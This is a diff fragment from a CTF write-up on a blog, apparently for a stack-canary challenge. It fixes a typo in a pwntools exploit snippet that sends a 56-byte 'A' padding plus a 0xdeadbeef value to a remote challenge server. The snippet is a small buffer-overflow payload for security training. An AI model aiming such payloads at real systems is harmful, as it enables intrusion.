exploiitm/blog/content/writeups/Guild_Selection_CTF/whatTheCanary.md

 		context.log_level = "critical"
 		payload = flat([
 			b"A"*56,
-			p32(0xdeadbeef) # simply enter the exact address, it will handle the endianess in its default values ])
+			p32(0xdeadbeef) # simply enter the exact address, it will handle the endianness in its default values ])
 		p = remote('10.21.232.38', 7001)
 		p.sendline(payload)